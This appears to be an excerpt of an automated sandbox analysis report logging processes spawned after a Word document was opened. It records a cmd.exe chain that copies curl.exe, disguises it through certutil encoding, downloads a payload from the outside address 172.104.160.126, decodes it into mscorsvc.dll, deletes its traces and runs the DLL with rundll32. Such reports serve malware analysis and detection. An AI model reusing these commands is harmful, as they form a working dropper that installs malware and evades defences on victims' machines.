        Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Imagebase:0x13f6d0000
        File size:3'151'128 bytes
        MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:16
        Start time:09:52:16
        Start date:22/07/2024
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13f3b0000
        File size:1'423'704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:17
        Start time:09:52:23
        Start date:22/07/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
        Imagebase:0x4a610000
        File size:345'088 bytes
        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:19
        Start time:09:52:23
        Start date:22/07/2024
        Path:C:\Windows\System32\xcopy.exe
        Wow64 process (32bit):false
        Commandline:xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
        Imagebase:0xfffa0000
        File size:43'008 bytes
        MD5 hash:20CF8728C55A8743AAC86FB8D30EA898
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:20
        Start time:09:52:24
        Start date:22/07/2024
        Path:C:\Windows\System32\certutil.exe
        Wow64 process (32bit):false
        Commandline:certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
        Imagebase:0xff760000
        File size:1'192'448 bytes
        MD5 hash:4586B77B18FA9A8518AF76CA8FD247D9
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:21
        Start time:09:52:24
        Start date:22/07/2024
        Path:C:\Windows\System32\certutil.exe
        Wow64 process (32bit):false
        Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
        Imagebase:0xff350000
        File size:1'192'448 bytes
        MD5 hash:4586B77B18FA9A8518AF76CA8FD247D9
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:22
        Start time:09:52:24
        Start date:22/07/2024
        Path:C:\Users\user\AppData\Local\Temp\curl.exe
        Wow64 process (32bit):false
        Commandline:C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
        Imagebase:0x13f300000
        File size:530'944 bytes
        MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:23
        Start time:09:52:26
        Start date:22/07/2024
        Path:C:\Windows\System32\certutil.exe
        Wow64 process (32bit):false
        Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
        Imagebase:0xffee0000
        File size:1'192'448 bytes
        MD5 hash:4586B77B18FA9A8518AF76CA8FD247D9
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:24
        Start time:09:52:26
        Start date:22/07/2024
        Path:C:\Windows\System32\rundll32.exe
        Wow64 process (32bit):false
        Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
        Imagebase:0xff780000
        File size:45'568 bytes
        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        No disassembly